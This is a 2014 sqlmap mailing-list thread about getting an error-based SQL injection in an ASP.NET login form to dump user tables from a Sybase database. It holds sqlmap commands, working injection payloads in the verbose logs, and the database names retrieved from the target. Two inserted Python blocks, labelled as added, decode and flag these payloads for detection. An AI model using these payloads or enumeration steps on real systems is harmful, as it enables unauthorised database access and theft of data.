Discussion:
[sqlmap-users] sqlmap with Sybase
les paul
2014-03-25 18:15:27 UTC
Hi all,

I'm running into trouble with sqlmap against a Sybase db. Here's the
fingerprint:

Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010

The technique I'm using is error-based through a POST to a vulnerable .aspx
page. I am able to enumerate the master db, but not the user tables, which
are what I want.

$ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah"
--dbms=sybase --threads=8 --batch --technique=E -D master --tables

This produces 58 tables, mostly sys* and some mon* which seem standard. I
can dump the sysobjects table using -D and -T, etc.

The web app is querying a database we'll call "ENERGY". If I try to "-D
ENERGY --tables", I get "No tables found, try using --hex or --no-cast
blahblah" (which don't work).

I used -v4 to look closely at the requests, and see sqlmap is prefixing the
tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after
experimenting I found doesn't work, so I wrote a small tamper script to
strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names
from the user tables (type='U'), but I'm still not able to get at the
actual data/rows in the tables.

I know it must be possible because the web app is definitely querying the
tables to validate a login (this is a sqli vuln in a login form, heh).

I'm not even sure this is really a bug in sqlmap - maybe something odd in
the way the database is built or something. I just thought I'd ask in case
anyone has had success using sqlmap against a similar Sybase db and has
some tips or suggestions.

Thanks for reading - I can provide more information if anyone's interested.
Miroslav Stampar
2014-03-25 18:22:45 UTC
Hi.

Can you please copy/paste the console output you get for sqlmap run with:

python sqlmap.py ... -D ENERGY --tables --parse-errors

Also, for:

python sqlmap.py ... --dbs

Bye
_______________________________________________
sqlmap-users mailing list
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
Richard Whitcroft
2014-03-25 18:55:45 UTC
Sure. The --parse-errors switch doesn't seem to produce anything
additional? I added -v3 just in case.

--
$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
--fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3

sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover
tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 14:46:47

[14:46:47] [DEBUG] cleaning up configuration parameters
[14:46:47] [DEBUG] setting the HTTP timeout
[14:46:47] [DEBUG] setting the HTTP method to POST
[14:46:47] [DEBUG] creating HTTP requests opener object
[14:46:47] [DEBUG] forcing back-end DBMS to user defined value
[14:46:47] [INFO] testing connection to the target URL
[14:46:47] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: ...
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[14:46:47] [INFO] testing Sybase
[14:46:47] [PAYLOAD] ***@gmail.com' AND 6746=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
[14:46:48] [WARNING] reflective value(s) found and filtering out
[14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
[14:46:48] [INFO] confirming Sybase
[14:46:48] [PAYLOAD] ***@gmail.com' AND 6332=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
[14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
[14:46:48] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
[14:46:48] [PAYLOAD] ***@gmail.com' AND 5371=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT
ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM
ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS
Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
[14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
[14:46:49] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
No tables found
[14:46:49] [INFO] fetched data logged to text files under
'/opt/sqlmap/output/xxx'

[*] shutting down at 14:46:49
--

$ python sqlmap.py ... --dbs

[14:50:13] [INFO] testing Sybase
[14:50:14] [WARNING] reflective value(s) found and filtering out
[14:50:14] [INFO] confirming Sybase
[14:50:14] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:50:14] [INFO] fetching database names
[14:50:14] [INFO] retrieved: 13
[14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
[14:50:15] [INFO] retrieved: 13
[14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row
data
[14:50:15] [INFO] retrieved: AR1
[14:50:16] [INFO] retrieved: AR10
[14:50:16] [INFO] retrieved: AR100TST
[14:50:17] [INFO] retrieved: AR15
[14:50:17] [INFO] retrieved: AR710
[14:50:18] [INFO] retrieved: AR710TST
[14:50:18] [INFO] retrieved: ENERGY_MASTER
[14:50:19] [INFO] retrieved: master
[14:50:20] [INFO] retrieved: model
[14:50:20] [INFO] retrieved: olympus
[14:50:21] [INFO] retrieved: sybsystemdb
[14:50:21] [INFO] retrieved: sybsystemprocs
[14:50:22] [INFO] retrieved: tempdb
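
A detection-side reading of the payloads in the log above, added here as an example (not part of the original thread and not sqlmap code): it decodes the CHAR() concatenations to recover the delimiters the vector wraps around the query result, and flags request values that have the shape of the error-based vector. The function names, indicator set, threshold and sample inputs are assumptions constructed for illustration.

```python
import re

# Constructed request values. The first mirrors the shape of the table-count
# payload in the log above; the second is an ordinary login value.
SAMPLES = [
    "user@example.com' AND 5371=CONVERT(INT,(SELECT "
    "CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT "
    "ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM "
    "ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS Legi)"
    "+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET",
    "user@example.com",
]

# One or more CHAR(n) calls joined by '+', e.g. CHAR(113)+CHAR(118)+...
CHAR_RUN = re.compile(
    r"CHAR\(\s*\d{1,3}\s*\)(?:\s*\+\s*CHAR\(\s*\d{1,3}\s*\))*", re.I)
CHAR_NUM = re.compile(r"CHAR\(\s*(\d{1,3})\s*\)", re.I)

# Indicator name -> pattern. Each pattern is taken from a feature visible in
# the logged payloads; the set and the names are assumptions of this example.
INDICATORS = {
    # integer compared with CONVERT(INT, (SELECT ...)): forces a cast error
    "convert_int_subquery": re.compile(
        r"=\s*CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I),
    # three or more CHAR() calls concatenated: string built without quotes
    "char_built_string": re.compile(
        r"(?:CHAR\(\s*\d{1,3}\s*\)\s*\+\s*){2,}CHAR\(", re.I),
    # system catalog tables referenced from user input
    "system_catalog": re.compile(
        r"\b(?:sysobjects|syscolumns|sysdatabases|sysusers)\b", re.I),
    # server globals / functions used by the fingerprinting payloads
    "server_global": re.compile(r"@@\w+|suser_id\s*\(", re.I),
    # trailing AND 'xxxx'='xxxx that re-balances the application's own quote
    "quote_balancing_tail": re.compile(r"AND\s+'(\w+)'\s*=\s*'\1\s*$", re.I),
}


def _run_to_text(run):
    """Turn one CHAR(..)+CHAR(..) run into the string it evaluates to."""
    return "".join(chr(int(n)) for n in CHAR_NUM.findall(run))


def decode_char_runs(value):
    """Rewrite every CHAR() run as a quoted literal so the query is readable."""
    return CHAR_RUN.sub(lambda m: "'" + _run_to_text(m.group(0)) + "'", value)


def delimiters(value):
    """Decoded CHAR() runs of three or more characters, in order of appearance.

    In the vector shown in the log these are the start and stop markers
    placed around the query result.
    """
    texts = [_run_to_text(m.group(0)) for m in CHAR_RUN.finditer(value)]
    return [t for t in texts if len(t) >= 3]


def indicators(value):
    """Sorted names of the indicators that match the value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def is_suspicious(value, threshold=2):
    """Flag a value once at least `threshold` independent indicators match."""
    return len(indicators(value)) >= threshold


if __name__ == "__main__":
    for sample in SAMPLES:
        print("value     :", sample[:60] + ("..." if len(sample) > 60 else ""))
        print("decoded   :", decode_char_runs(sample))
        print("delimiters:", delimiters(sample))
        print("indicators:", indicators(sample))
        print("suspicious:", is_suspicious(sample))
        print()
```

The decoded delimiters (here qvhrq and qtlpq) are also worth searching for in response bodies and application error logs, since the error-based vector places the extracted value between them.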
Miroslav Stampar
2014-03-25 18:59:49 UTC
Strange thing is that you are not getting anything with --parse-errors as
you are dealing with a "missing database" problem inlined with error-based
technique.

Can you please send a traffic file (if you want you can send it privately
to me) for that same run (where you've used --parse-errors)?

Bye
--
Miroslav Stampar
http://about.me/stamparm

--089e0158b87cd86de504f572f4a1
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

<div dir="ltr"><div>Strange thing is that you are not getting anything with --parse-errors as you are dealing with a &quot;missing database&quot; problem <span>inlined</span> with error-based technique.</div><div><br></div>
<div>Can you please send a traffic file (if you want you can send it privately to me) for that same run (where you&#39;ve used --parse-errors)?</div><div><br></div><div>Bye</div></div><div class="gmail_extra"><br><br><div class="gmail_quote">
On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <span dir="ltr">&lt;<a href="mailto:***@gmail.com" target="_blank">***@gmail.com</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<div dir="ltr"><div><div>Sure. The --parse-errors switch doesn&#39;t seem to produce anything additional? I added -v3 just in case. </div><div><br></div><div>--</div><div>$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8 --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3</div>

<div><br></div><div>    sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover tool</div><div>    <a href="http://sqlmap.org" target="_blank">http://sqlmap.org</a></div><div><br></div><div>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</div>

<div><br></div><div>[*] starting at 14:46:47</div><div><br></div><div>[14:46:47] [DEBUG] cleaning up configuration parameters</div><div>[14:46:47] [DEBUG] setting the HTTP timeout</div><div>[14:46:47] [DEBUG] setting the HTTP method to POST</div>

> [14:46:47] [DEBUG] creating HTTP requests opener object
> [14:46:47] [DEBUG] forcing back-end DBMS to user defined value
> [14:46:47] [INFO] testing connection to the target URL
> [14:46:47] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: POST
> Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
>     Payload: ...
>     Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
> ---
> [14:46:47] [INFO] testing Sybase
> [14:46:47] [PAYLOAD] ***@gmail.com' AND 6746=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
> [14:46:48] [WARNING] reflective value(s) found and filtering out
> [14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
> [14:46:48] [INFO] confirming Sybase
> [14:46:48] [PAYLOAD] ***@gmail.com' AND 6332=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
> [14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
> [14:46:48] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
> [14:46:48] [PAYLOAD] ***@gmail.com' AND 5371=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
> [14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
> [14:46:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> No tables found
> [14:46:49] [INFO] fetched data logged to text files under '/opt/sqlmap/output/xxx'
>
> [*] shutting down at 14:46:49
> --
>
> $ python sqlmap.py ... --dbs
>
> [14:50:13] [INFO] testing Sybase
> [14:50:14] [WARNING] reflective value(s) found and filtering out
> [14:50:14] [INFO] confirming Sybase
> [14:50:14] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:50:14] [INFO] fetching database names
> [14:50:14] [INFO] retrieved: 13
> [14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
> [14:50:15] [INFO] retrieved: 13
> [14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row data
> [14:50:15] [INFO] retrieved: AR1
> [14:50:16] [INFO] retrieved: AR10
> [14:50:16] [INFO] retrieved: AR100TST
> [14:50:17] [INFO] retrieved: AR15
> [14:50:17] [INFO] retrieved: AR710
> [14:50:18] [INFO] retrieved: AR710TST
> [14:50:18] [INFO] retrieved: ENERGY_MASTER
> [14:50:19] [INFO] retrieved: master
> [14:50:20] [INFO] retrieved: model
> [14:50:20] [INFO] retrieved: olympus
> [14:50:21] [INFO] retrieved: sybsystemdb
> [14:50:21] [INFO] retrieved: sybsystemprocs
> [14:50:22] [INFO] retrieved: tempdb
>
> On 25 March 2014 14:22, Miroslav Stampar <***@gmail.com> wrote:
>> Hi.
>>
>> Can you please copy/paste the console output you get for sqlmap run with:
>>
>> python sqlmap.py ... -D ENERGY --tables --parse-errors
>>
>> Also, for:
>>
>> python sqlmap.py ... --dbs
>>
>> Bye
>>
>> On Mar 25, 2014 7:16 PM, "les paul" <***@gmail.com> wrote:
>>> Hi all,
>>>
>>> I'm running into trouble with sqlmap against a Sybase db. Here's the fingerprint:
>>>
>>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
>>>
>>> The technique I'm using is error-based through a POST to a vulnerable .aspx page. I am able to enumerate the master db, but not the user tables, which are what I want.
>>>
>>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" --dbms=sybase --threads=8 --batch --technique=E -D master --tables
>>>
>>> This produces 58 tables, mostly sys* and some mon* which seem standard. I can dump the sysobjects table using -D and -T, etc.
>>>
>>> The web app is querying a database we'll call "ENERGY". If I try to "-D ENERGY --tables", I get "No tables found, try using --hex or --no-cast blahblah" (which don't work).
>>>
>>> I used -v4 to look closely at the requests, and see sqlmap is prefixing the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after experimenting I found doesn't work, so I wrote a small tamper script to strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names from the user tables (type='U'), but I'm still not able to get at the actual data/rows in the tables.
>>>
>>> I know it must be possible because the web app is definitely querying the tables to validate a login (this is a sqli vuln in a login form, heh).
>>>
>>> I'm not even sure this is really a bug in sqlmap - maybe something odd in the way the database is built or something. I just thought I'd ask in case anyone has had success using sqlmap against a similar Sybase db and has some tips or suggestions.
>>>
>>> Thanks for reading - I can provide more information if anyone's interested.

--
Miroslav Stampar
http://about.me/stamparm
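
The [PAYLOAD] lines in the log above all follow the error-based vector it prints: a CONVERT(INT, ...) around a sub-select whose result is wrapped in CHAR()-built delimiters. The following is an added example, not part of the original thread and not sqlmap code: a Python check that flags that shape in request parameter values and decodes the delimiters. The function names are hypothetical, the samples are constructed from the logged payloads with the address replaced, and values are assumed to be URL-decoded already.

```python
import re

# Shape of the logged vector: <n>=CONVERT(INT,(SELECT <marker>+(<query>)+<marker>))
CONVERT_SUBSELECT = re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)
CHAR_RUN = re.compile(r"\bCHAR\s*\(\s*\d+\s*\)(?:\s*\+\s*CHAR\s*\(\s*\d+\s*\))+", re.I)
CHAR_ARG = re.compile(r"\bCHAR\s*\(\s*(\d+)\s*\)", re.I)
CATALOG = re.compile(r"(?:\w+\.\w*\.)?\b(?:sysobjects|syscolumns|sysdatabases)\b", re.I)


def decode_char_runs(value):
    """Decode every CHAR(n)+CHAR(n)+... run into the string it spells."""
    decoded = []
    for run in CHAR_RUN.finditer(value):
        codes = [int(n) for n in CHAR_ARG.findall(run.group(0))]
        decoded.append("".join(chr(c) for c in codes if c < 256))
    return decoded


def inspect(value):
    """Classify one parameter value (assumed to be URL-decoded already)."""
    reasons = []
    if CONVERT_SUBSELECT.search(value):
        reasons.append("convert-int-subselect")
    markers = decode_char_runs(value)
    if len(markers) >= 2:
        reasons.append("char-built-delimiters")
    catalog = [m.group(0) for m in CATALOG.finditer(value)]
    if catalog:
        reasons.append("system-catalog")
    return {"suspicious": "convert-int-subselect" in reasons,
            "reasons": reasons, "markers": markers, "catalog": catalog}


# Constructed samples modelled on the [PAYLOAD] lines in the log (address replaced).
START = "CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)"
STOP = "CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113)"
SAMPLES = {
    "probe": "user@example.com' AND 6746=CONVERT(INT,(SELECT " + START
             + "+(SELECT (CASE WHEN (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) END))+"
             + STOP + ")) AND 'eeea'='eeea",
    "tables": "user@example.com' AND 5371=CONVERT(INT,(SELECT " + START
              + "+(SELECT ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM "
              + "ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS Legi)+" + STOP
              + ")) AND 'idET'='idET",
    "benign": "jane.doe@example.com",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, inspect(value))
```

The decoded markers are the random delimiter strings the tool later looks for in the database error text, so the same strings appearing in an HTTP response are a second place to alert on.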
